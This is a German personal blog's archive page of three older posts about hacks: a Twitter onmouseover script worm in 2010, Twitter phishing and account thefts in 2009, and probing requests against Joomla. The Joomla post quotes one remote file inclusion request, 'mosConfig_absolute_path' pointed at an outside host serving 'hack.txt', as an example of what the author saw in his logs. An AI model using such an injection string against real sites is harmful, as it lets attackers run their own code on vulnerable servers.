Mike Schnoor
  • Start
  • LinkedIn
  • Blog (Archiv)
  • Über mich
  • Menü Menü

Schlagwortarchiv für: Hack

Twitter mit CSS-Script gehackt!

Microblogging, Social Media

Erst war es eine schöne, bunte Farbenwelt, mit der ein Account bei Twitter darstellte, dass mit einer kleinen Manipulation einzelne Tweets von CSS gestaltet werden konnten.

Das spontane Ergebnis waren euphorische Freude und gepaart mit Unverständnis in der Netzgemeinde, doch der Schein war bekanntlich wieder trügerisch.

Ich ahnte bereits, dass dies nicht mit rechten Dingen zugehen konnte. Schließlich erkannte man bei dem regenbogenfarbigen Account, dass einzelne Tweets mit CSS-Kommandos behaftet waren. Nach fast zwei Stunden schaute ich bei Twitter nach einigen aktuellen Themen und bemerkte, dass ein „lebensgroßer“ Buchstabensalat in meiner Timeline hing. Zeitgleich erfolgten automatische Postings über meinen Twitter-Account.

Als ich versuchte, die Seite zu aktualisieren und einen Hinweis auf die nicht-betroffene mobile Variante von Twitter zu geben, wurde mein Twitter-Account direkt das Opfer einer Attacke bzw. einen Hijack per CSS-Script. Prompt griff ein Bekannter von einer Münchner Agentur zum Telefon und beschwerte sich, leicht schadenfroh, bei mir, warum ich seine Timeline jetzt auch mit „Müll“ zudonnern würde. Immerhin konnte ich dem Problem durch die Apps und mobile Version nach nur wenigen Minuten Herr werden. Ich rate zudem, dass jeder, der sich von diesem Wirrwarr nicht von allein befreien kann, sein Passwort bei Twitter schnellstmöglich ändert. Solange von offizieller Stelle kein Feedback folgt, sollte man davon absehen, das Webinterface von Twitter zu verwenden.

Update:
Mehr zu dem Thema steht bei Sophos und Techcrunch. Auch die dpa hat eine passende Meldung zu dem Twitter-Hack verbreitet – hier in Version bei der Süddeutschen.

Der Fehler soll scheinbar durch einen Bug bei „t.co“, einem eigenen Dienst von Twitters zur Kürzung von URLs, verursacht worden sein, über den ein Javascript-Code mit einem „onmouseover“-Kommando clientseitig ausgeführt wurde. Dabei besticht ein fadenscheiniger Geschmack, dass genau dieser „URL-Shortener“ zur weiteren Sicherheit für die Twitter-Nutzer einen weiteren Beitrag leisten sollte.

21. September 2010/von Mike Schnoor
https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp 0 0 Mike Schnoor https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp Mike Schnoor2010-09-21 14:52:282013-11-20 07:49:10Twitter mit CSS-Script gehackt!

Unsicherheiten bei Twitter

Blogkultur, Medien, Microblogging, Public Relations, Social Media

Twitter Hacks – nur so kann man es nennen. Phishingangriffe auf eines der weltweit beliebtesten Microblogging-Kommunikationssysteme zwingen den marktbeherrschenden Giganten in die Knie. Allein durch die wundervolle API wurde der Zugriff auf zahlreiche Accounts ermöglicht, so dass einige Twitter-Accounts über Nacht gestohlen wurden: Barack Obama, Britney Spears, Huffington Post oder Fox News sind nur einige prominente Accounts, die gehackt wurden.

Für mich bedeutete dies ganz klar: Das Passwort ändern und externe Dienste aussperren. Sicherheit geht vor. Für die Zukunft sollte Twitter definitiv einen API-Key anbieten und damit die Verwendung des Passwortes bei Fremdanbietern unterbinden. Andere Autoren sehen das ganz ähnlich.

Das wichtigste ist jetzt konstruktive Öffentlichkeitsarbeit für den wichtigen Dienstleister, den nicht nur Early Adopter, Nerds oder Geeks nutzen. Twitter ist Mainstream in 2008 geworden und steht in dem neuen Jahr für den schnellebigen Lifestream-Lifestyle der Netzöffentlichkeit. Ein paar Blogpostings helfen nur, die Otto-Normalo-Gemüter zu beruhigen. Wer seine Online-Identität verstärkt mit Twitter aufgebaut oder unterstützt hat, kann das Vertrauen in Twitter auch sehr schnell wieder verlieren und auf ein eigenes (un-social) Kommunikationstool wie ein einfaches Tumble-Blog oder doch ein normales Blog setzen.

6. Januar 2009/von Mike Schnoor
https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp 0 0 Mike Schnoor https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp Mike Schnoor2009-01-06 13:06:052013-11-20 07:56:55Unsicherheiten bei Twitter

Joomla CMS Hack

Blogkultur

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

12. Februar 2008/von Mike Schnoor
https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp 0 0 Mike Schnoor https://mikeschnoor.com/upload/2026/06/mikeschnoor-logo.webp Mike Schnoor2008-02-12 22:16:222008-02-12 22:16:22Joomla CMS Hack

Suche

Search Search

Über mich

Mike Schnoor ist Head of Marketing bei kernpunkt und arbeitet seit über 25 Jahren in der Digitalbranche. Dieses Blogarchiv bündelt ältere Beiträge zu Digitalisierung, Marketing, Kommunikation und Digitalwirtschaft. Aktuelle Inhalte erscheinen vor allem auf LinkedIn und im kernpunkt Magazin.

Über mich

Mike Schnoor ist Head of Marketing bei kernpunkt und arbeitet seit über 25 Jahren an der Schnittstelle von Marketing, Kommunikation, Technologie und digitalen Geschäftsmodellen. Seine Themen: AI im E-Commerce, Digital Commerce, Product Experience, B2B-Marketing und die Frage, wie aus fachlicher Expertise sichtbare Marktpräsenz entsteht.

Aus dem Archiv

  • Blick in die digitale Kristallkugel: Meine Top-10 Technologietrends für 2023

    Blick in die digitale Kristallkugel: Meine Top-10 Technologietrends für 2023

    6. Januar 2023
  • Pro und Kontra zur effektiven Content-Erstellung mit ChatGPT

    Pro und Kontra zur effektiven Content-Erstellung mit ChatGPT

    5. Januar 2023
  • Digitale Geschäftsmodelle für kleine und mittlere Unternehmen (KMU)

    Digitale Geschäftsmodelle für kleine und mittlere Unternehmen (KMU)

    15. Dezember 2022
  • Mittelstand-Digital Zentrum Rheinland veröffentlicht Leitfaden zum einfachen Einstieg in die Digitalisierung

    Mittelstand-Digital Zentrum Rheinland veröffentlicht Leitfaden zum einfachen Einstieg in die Digitalisierung

    12. Dezember 2022
  • Wie können KMU und Startups bei der Digitalisierung voneinander profitieren?

    Wie können KMU und Startups bei der Digitalisierung voneinander profitieren?

    8. Dezember 2022

Suche

Search Search
© Copyright 1997-2026 Mike Schnoor. Alle Rechte vorbehalten.
  • Link zu Instagram
  • Link zu LinkedIn
  • Link zu Rss dieser Seite
  • Impressum
  • Datenschutz
Nach oben scrollen Nach oben scrollen Nach oben scrollen

Einwilligung zur Datenerhebung und zur Nutzung von Cookies: Diese Internetseite verwendet Cookies. Cookies sind kleine Textinformationen, die über Browser im Endgerät als Datei gespeichert werden. Cookies stellen keine schadhaften Dateien dar, sondern erlauben User Interaktionen. Weitere Informationen entnehmen Sie bitte unserem Datenschutzhinweis. Impressum

Einwilligung nicht geben.Einwilligung jetzt ändern.Alle Cookies akzeptieren.

Einwilligung zur Datenerhebung und zur Nutzung von Cookies



Wie wir mit Cookies umgehen

Diese Internetseite verwendet Cookies. Cookies sind kleine Textinformationen, die über Browser im Endgerät als Datei gespeichert werden. Cookies stellen keine schadhaften Dateien dar, sondern erlauben User Interaktionen.

Weitere Informationen entnehmen Sie bitte unserem Datenschutzhinweis.

Einstellungen übernehmenNur Benachrichtigung ausblenden